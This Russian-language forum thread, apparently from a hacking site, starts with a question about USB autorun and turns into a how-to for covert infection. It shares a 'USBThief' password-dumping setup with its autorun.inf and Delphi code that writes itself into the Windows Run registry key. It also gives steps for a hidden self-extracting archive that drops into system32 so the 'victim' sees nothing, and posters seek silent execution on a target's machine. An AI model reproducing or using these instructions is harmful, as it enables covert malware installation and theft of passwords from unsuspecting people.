Как можно сделать автозапуск с флеш-карты?
 

Как можно сделать автозапуск с флешки, чтобы когда я её воткну программа на флешке автоматически запускалась
Пробовал inf файл создавать
[autorun]
open=opera.exe
icon=icon.ico
Но так не работает. Как это можно сделать?

Либо у тебя авторан выключен, либо файла opera.exe в корне флешки нет, либо ты inf файл криво обозвал

autorun.inf ?

Я пробовал файл autorun.inf создавать и в нём написал [autorun]
open=opera.exe
icon=icon.ico

Kaimi если он выключен какой ключ реестра его включает?

Источник :D
http://forum.antichat.ru/thread63601-usbthief.html

Итак, для установки нам потребуется USB наситель и данная програмка.
Распакуйте архив, и из папки USBThief скопируете всё на флэшку.
(Важно!!! Вы ДОЛЖНЫ скопировать все файлы в главную дирикторию USB насителя! Никаких папок создавать не надо!)

Как работает:
Вставьте USB в компьютер Вашей жертвы
В папке "dump" на USB вы увидите все пароли

Ссыли:
1---
2---

А вот содержимое авторана

[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

У меня USB Thief не работает почему то. А для чего nircmd нужен?

nircmd собирает пассы, типа пинча только нужно флешку вставить!

Отличается от пинча тем что не палится!

У меня тоже не работает. Я все сделал как ты написал. но голяк. Может там еще чтото нужно добавить или изменить?

у меня тоже не катить автоматический запуск, после двойного клика начинает запускатся. А что если человек решил открыть правой кнопкой мыши?

- пока что эффективного алгоритма, предугадывающего действия человека, не придумано :)
- если не запускается автозапуском, значит он (автозапуск) отключен для сменных устройств (имхо)

У тебя точно Opera.exe лежит в корневой там же где и autorun.inf? Если да, то какая у тебя ОС?

XP

Какой-нибудь твикер делается вот так:


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\Explorer

NoDriveTypeAutoRun

Допустимые значения ключа:
0x1 - отключить автозапуск на приводах неизвестных типов
0x4 - отключить автозапуск сьемных устройств
0x8 - отключить автозапуск НЕсьемных устройств
0x10 - отключить автозапуск сетевых дисков
0x20 - отключить автозапуск CD-приводов
0x40 - отключить автозапуск RAM-дисков
0x80 - отключить автозапуск на приводах неизвестных типов
0xFF - отключить автозапуск вообще всех дисков.

Значения могут комбинироваться суммированием их числовых значений.

Значения по умолчанию:
0x95 - Windows 2000 и 2003 (отключен автозапуск сьемных, сетевых и неизвестных дисков)
0x91 - Windows XP (отключен автозапуск сетевых и неизвестных дисков)

Так же можно это осуществить с помощью групповых политик:
Конфигурация компьютера->административные шаблоны->Система->отключить автозапуск.

В случае с WinXP Home Edition применима только правка реестра вручную из-за отсутствия инструмента правки групповых политик.

Добавь в авторан:

shell\1=Открыть
shell\1\Command=start.bat

И в контекстном меню первым будет стоять это "Открыть".
Палится тем что будет два "Открыть".
Встречал системы где это не работает, пунк контекстного меню не первый, но на большинстве все ОК.

а в висте как отключить?

в какой файл пасы записываются????????

В эту папку:

А как запускаются вири с флешок ?
Им помоему вообще наплевать на ключ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\Explorer

Обьясните кто нибудь?

вчера рылсяу друга по флеше(принес вирусов поубивать), и нарыл червя Win32.Kido-C. так вот у него в авторане вообще какая-то левая фигня(т.е. нет страндартных open и т.д), как по мне смхивает на машинный код. и работает т.к. доктор прописал. кто обьяснит?.

сам файл могу выложить если интерестно

Ну так выложи

Это давно не новость на WHB все спалили!

Я делаю так:

1. Сначало надо подготовить прогу)
Для этого в ее коде для начало в разделе Uses добовляем модуль "registry"
Затем в OnCreate формы пишем вот этот код:


var
reg: Tregistry;

begin
reg:= Tregistry.Create;
reg.RootKey:= HKEY_LOCAL_MACHINE;
reg.OpenKey('Software', true);
reg.OpenKey('Microsoft', true);
reg.OpenKey('Windows', true);
reg.OpenKey('CurrentVersion', true);
reg.OpenKey('Run', true);
reg.WriteString('sstt', Application.ExeName);
reg.CloseKey;
end:

Обьясню для новичков)) Данный код прописывает себя в реестре автозагрузке)) тоесть куда бы вы не поместитили прогу она сама себя запишет в авторан))

2.Теперь перейдем не посредсвенно к запуску с флешки)) Наш цель состоит в том что бы когда флешка была подключина к порту USB она автоматически копировалась на жесткий диск) причем так что бы этого не видела жертва))

Дальше делаем следующию операцию:
Нажимай правую кнопку на нашей проге, затем "добавить в архив..." Теперь надо поменять пару настроек:

1. ставим галочку напротив пункта:"Создать SFX арив
2. Потом выбираем вкладку дополнительно и нажимаем на : "Параметры SFX"
3. В "Путь для распоковки" указывем путь где вы хотите что бы располагалась ваша прога)) я указал:
C:\WINDOWS\system32
4. В "Выполнить после распоковки" пишем опять же:
C:\WINDOWS\system32 ,но только теперь дабовляем нашу прогу)) допустим что она называеться:
"proga.exe", тогда в итоге получиться:
C:\WINDOWS\system32\proga.exe
5. Далее переходим на на закладку"Режимы"
и ставим галочку рядом с "Скрыть все"
6. Далее нажимаем "ок"))

Осталось только сделать что бы наш архив запустилься)) для этого в корне с флешкой создаем файл "autorun.inf" это можно сделать при помощи блокнота))
Далее открываем все с помощью того же блокнота это файл и встовляем туда это:
[autorun]
icon=icons\drive.ico
shellexecute=proga.exe
Сохраняем и закрываем блокнот!)

Все, подведем итог:

Когда наша флешка подключаеться с USB, то запускаеться наш архив "proga.sfx.exe" благодоря:
"autorun.inf" После чего наш архив распоковывает и запускает нашу прогу(причем на экране не чего не происходит) Так же при этом запуске программа прописывает себе а автозагрузке)) Все файл на компьютере и запускаеться вместе с системой))

P.S для модераторов: статья обьянясняет как запустить с флешки програму!! так что прозьба не банить!)Так как статья написана в тему, если возникнут какие нибудь проблемы прозьба сообщить мне, и я их с удовольствием исправлю!)


Кому что не понятно или есть свои предложения пишите в личку!!!

djKayot, пост 19, не разобрался в своём вопросе? если можно, выложи файл...
В общем меня этот вопрос крайне остро интересует, кто научит, щедро награжу)))
и не принципиально, флешка, USB-хард или ещё что-то... главное USB => запуск *.exe
Если метод весь из себя такой "секретный", то прошу в асю 556663224, там всё и оговорим.

ShamanVasiliy что ты конткретно хочешь?

тоже, что и ТС - запуск *.exe на тачке жертвы абсолютно без палева и каких-либо действий со стороны пользователя, используя исключительно доступ к USB порту, ось ХР, вероятнее всего сп 2, никакие альтернативные методы, соц инж и пр., не актуальны.

В ксакепе описывали метод запуска с помощью создания на флэшке раздела сд-диска, "флэшка-убийца" вроде статья называлась. Ссылка на pdf http://www.xakep.ru/magazine/xa/126/xa_126.pdf

зы: что эта тема делает в прикрепленных? о_0

а теперь все вместе и дружно, "Спаааа-сииии-бооооо, дядя iv. !!!"
низкий поклон, очень выручили)))

или же альтернативный вариант, не требующий спец флешки, но неуниверсальный
http://flashboot.ru/index.php?name=News&op=article&sid=29
(линка из статьи, укащанной в 26 посте)

[autorun]
ICON=autorun.ico
OPEN=autorun.exe

autorun.ico - иконка

autorun.exe - файл авторана ( можно изменять на любое расш.